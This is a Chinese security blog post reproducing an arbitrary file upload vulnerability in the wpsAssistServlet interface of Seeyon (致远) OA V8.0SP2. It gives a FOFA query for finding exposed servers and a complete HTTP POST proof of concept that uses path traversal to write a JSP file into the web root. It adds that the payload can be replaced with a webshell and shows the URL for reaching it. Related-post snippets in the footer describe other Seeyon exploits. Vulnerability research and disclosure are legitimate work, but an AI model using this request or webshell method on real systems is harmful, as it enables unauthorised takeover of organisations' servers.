致远OA wpsAssistServlet接口存在任意文件上传漏洞

最新推荐文章于 2024-05-10 14:00:27 发布
最新推荐文章于 2024-05-10 14:00:27 发布
阅读量582 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134188507
版权

致远OA wpsAssistServlet接口存在任意文件上传漏洞

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力,夯实协同运营中台的落地效果;以移动化、AI智能推进前台的应用创新,实现企业轻量化、智能化业务场景,促进企业全过程管理能效,赋予企业协同工作和运营管理的新体验;在协同运营平台全面升级的基础上,V8.0深耕大型企业管理模式、运营机制,进一步强化“协同”在管理中的价值,推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级,帮助企业构筑全程、全域、全端的运营和服务能力,提升人员效率和组织绩效,赋能企业数字化、智能化发展。

漏洞影响

致远互联-OA V8.0SP2

漏洞危害

致远OA wpsAssistServlet接口存在任意文件上传漏洞,未经允许的攻击者可通过上传webshell接管服务器

网络测绘

Fofa: app=“致远互联-OA” && title=“V8.0SP2”

漏洞复现

1. 构造poc

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/36011.jsp&fileId=2 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=DA7A3D091BXXXXXXXXXXXXXXXX4BA41B; loginPageURL=
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71
Content-Length: 215

--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("215882935");%>  
--a4d7586ac9d50625dee11e86fa69bc71--

2. 发送数据包

会在网站根目录生成一个36011.jsp的文件
在这里插入图片描述上传的文件内容可替换为jsp木马

3. 访问webshell地址

http://127.0.0.1:8899/36011.jsp

在这里插入图片描述

小胡yhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】致远互联OA fileUpload.do 任意文件上传漏洞
qq_67810151的博客
04-09 624
致远互联OA fileUpload.do接口存在文件上传漏洞,未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制,并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器,获取服务器权限。
【1day】致远OA漏洞wpsAssistServlet接口任意文件上传漏洞学习
记录并分享学习安全的知识点..
08-11 1736
2022护网新爆出的致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
致远OA wpsAssistServlet 任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-17 941
致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力,夯实协同运营中台的落地效果;以移动化、AI智能推进前台的应用创新,实现企业轻量化、智能化业务场景,促进企业全过程管理能效,赋予企业协同工作和运营管理的新体验。
致远OA文件上传漏洞(含批量检测POC)
最新发布
baimao__Ch的博客
05-10 1002
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。
致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 4634
致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现
致远OA-ajax.do未授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在未授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
致远OA开发REST远程接口实现发送表单
08-02
本文将深入探讨如何在“致远OA”(ZhiYuan Office Automation)系统中通过Java开发REST远程接口,实现远程发起OA表单的功能。我们将详细介绍这个过程,并提供相关的代码示例、所需jar包以及致远API的引用地址。 ...
致远OA任意文件下载1
08-08
然而,在致远OAwebmail.do文件中存在一个任意文件下载漏洞,攻击者可以通过修改filePath参数来下载服务器上的敏感文件。 漏洞详情 该漏洞是由于webmail.do文件的filePath参数过滤不严所致。攻击者可以通过构造...
致远OA上传文件、附件方法
04-02
本篇文章将重点讲解如何在致远OA系统中通过Java代码实现文件上传以及获取附件ID的操作,以便于后续的表单提交。 首先,我们来理解一下“附件ID”。在OA系统中,每个上传的文件都会被赋予一个唯一的ID,这个ID在后续...
致远OA8.0自定义业务接口配置、调用方法.pdf
05-31
致远OA8.0自定义业务接口配置与调用详解》 在信息化管理日益复杂的今天,企业内外部系统的高效协同变得至关重要。致远OA8.0提供了自定义业务接口的功能,使得不同应用之间能够无缝交互,实现了集团内部与外部单位...
致远OA getAjaxDataServlet XXE漏洞复现(QVD-2023-30027)
0xSec
01-08 3814
致远互联-OA getAjaxDataServlet 接口存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
【新】致远OA从前台XXE到RCE漏洞分析
C20220511的博客
11-06 2370
和我们之前分享过的通达OA漏洞类似,这类主流OA系统现在想要直接一步达到RCE的效果是非常困难的。根据错误提示反向找到对应的逻辑代码com.seeyon.agent.common.interceptor. SecurityInterceptor的preHandle方法,这应该是全局的拦截器,其中关键的代码如图3.6所示。在java环境下是不能直接通过XXE来执行系统命令的,并且这里的XXE是不具有回显的功能,仅能通过XXE来达到SSRF的效果,并且只能进行GET类型的请求。那么这些参数是怎么来的呢?
致远oa wpsassistservlet任意文件上传漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-29 2132
致远OA是一款流行的协同管理软件,在各中、大型企业机构中广泛使用。致远oa wpsassistservlet漏洞由于致远OA旧版本某些接口能被未授权访问,并且部分函数存在过滤不足,攻击者通过构造恶意请求,权限绕过漏洞,可在无需登录的情况下上传恶意脚本文件,从而控制getshell。致远oa wpsassistservlet漏洞影响范围,致远oa wpsassistservlet漏洞漏洞检测 测试POC:http://1.2.3.4:80/seeyon/thirdpartyController.do.css/
WPS加载项系列(1)第一个WPS项目
kuibuzhiqianli的博客
09-05 5031
前言 任何一个新技术的学习使用,一般都由demo开始,然后逐步深入直到完全掌握,这个也不例外,所以这个系列的第一篇文章主要写的是如何将官方提供的demo跑起来。 一、项目地址 官方提供的演示示例(OA助手) https://code.aliyun.com/zouyingfeng/wps/tree/master 官方提供的开发文档 https://open.wps.cn/docs/office 二、环境安装 1.安装node.js 下载地址:https://nodejs.org/en/d
【1day】致远 A8系统getAjaxDataServlet-xxe接口任意文件读取学习
记录并分享学习安全的知识点..
12-05 1596
致远 A8+ OA(Office Automation)是由中国致远软件开发的一套综合性办公自动化软件解决方案,Office Automation基于B/S架构(浏览器/服务器架构)的企业级应用软件,旨在帮助企业实现高效的办公管理和信息化建设。致远 A8系统getAjaxDataServlet-xxe接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
文件上传web攻击】
qq_45678433的博客
07-26 453
一级标题 二级标题 三级标题 四级标题 五级标题 六级标题
致远OA任意文件上传
Dalian0的博客
11-03 5207
漏洞影响泛微: 致远OA V8.0 致远OA V7.1、V7.1SP1 致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3 致远OA V6.0、V6.1SP1、V6.1SP2 致远OA V5.x 致远OA G6 搭建环境测试: 漏洞验证: 访问/seeyon/autoinstall.do/..;/ajax.do出现下图异常,存在漏洞 抓包修改数据包 POC: POST /seeyon/autoinstall.do.css/..;/ajax.do?method=.
致远oa wpsassistservlet 任意文件读取漏洞
12-27
致远oa wpsassistservlet 任意文件读取漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取系统中的任意文件,包括重要的系统文件及用户数据文件。攻击者可以通过该漏洞来获取敏感信息,危害系统安全。 这个漏洞存在的根本原因可能是在致远oa wpsassistservlet中对用户输入的数据没有进行充分的验证和过滤,导致攻击者可以构造恶意请求,获取系统文件的内容。一旦攻击者成功利用这个漏洞,就可能对系统进行攻击,损害系统的安全性。 针对致远oa wpsassistservlet 任意文件读取漏洞,我们可以采取一些措施来加强系统的安全性。首先,及时更新系统补丁,确保系统能够及时修复这个漏洞。其次,加强对用户输入数据的验证和过滤,限制用户的输入范围,避免攻击者利用恶意输入来进行攻击。另外,加强系统的监控和审计功能,及时发现异常行为,并进行处理。 总的来说,致远oa wpsassistservlet 任意文件读取漏洞是一种严重的安全隐患,需要引起相关部门的重视,采取必要的措施来确保系统的安全性。只有不断加强系统的安全防护措施,及时修复存在漏洞,才能有效地提升系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值